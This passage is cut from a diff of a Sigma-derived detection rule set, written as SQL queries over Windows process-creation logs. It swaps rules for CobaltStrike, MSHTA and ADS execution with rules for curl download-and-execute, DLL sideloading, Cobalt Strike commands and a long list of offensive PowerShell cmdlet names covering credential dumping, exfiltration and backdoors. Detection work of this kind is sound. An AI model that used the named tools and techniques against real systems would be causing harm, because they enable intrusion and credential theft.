CommandLine LIKE '% /domain:%' ESCAPE '\\' OR CommandLine LIKE '% /path:%' ESCAPE '\\' OR CommandLine LIKE '% /ca:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" + "filename": "proc_creation_win_hktl_certify.yml" }, { 
- "title": "CobaltStrike Load by Rundll32", - "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", + "title": "Curl Download And Execute Combination", + "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", "status": "test", - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "author": "Wojciech Lesicki", + "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", + "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" + "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" }, { - "title": "MSHTA Suspicious Execution 01", - "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "status": "test", - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "title": "DLL Sideloading by VMware Xfer Utility", + "id": 
"ebea773c-a8f1-42ad-a856-00cb221966e8", + "status": "experimental", + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" + "attack.t1574.002" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_susp_execution.yml" + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" }, { - "title": "PUA- IOX Tunneling Tool Execution", - "id": "d7654f02-e04b-4934-9838-65c46f187ebc", + "title": "Operator Bloopers Cobalt Strike Commands", + "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", "status": "experimental", - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.command_and_control", - "attack.t1090" + 
"attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_iox.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" }, { - "title": "Run PowerShell Script from ADS", - "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", - "status": "test", - "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "author": "Sergey Soldatov, Kaspersky Lab, 
oscd.community", + "title": "Malicious PowerShell Commandlets - ProcessCreation", + "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", + "status": "experimental", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADR%' ESCAPE '\\' OR CommandLine LIKE 
'%Export-ADRCSV%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRExcel%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRHTML%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRJSON%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRXML%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ADIDNS%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' 
OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE 
'%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR 
CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' 
ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%New-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_ads.yml" + "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" }, { - "title": "Suspicious Use of CSharp Interactive Console", - "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", + "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", + "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", "status": "test", - "description": "Detects the execution of CSharp interactive console by PowerShell", - "author": "Michael R. 
(@nahamike01)", + "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.execution", - "attack.t1127" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_use_of_csharp_console.yml" + "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" }, { - "title": "Ps.exe Renamed SysInternals Tool", - "id": "18da1007-3f26-470f-875d-f77faf1cab31", - "status": "test", - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - PowerTool Execution", + "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "status": "experimental", + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "author": "Nasreddine Bencherchali 
(Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" + "attack.t1562.001" ], "falsepositives": [ - "Renamed SysInternals tool" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine = 'ps.exe -accepteula')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" ], - "filename": "proc_creation_win_apt_ta17_293a_ps.yml" + "filename": "proc_creation_win_hktl_powertool.yml" }, { - "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", - "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "title": "Disabled Volume Snapshots", + "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", "status": "test", - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "author": "John Lambert (rule)", + "description": "Detects commands that temporarily turn off Volume Snapshots", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE 
'%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE 
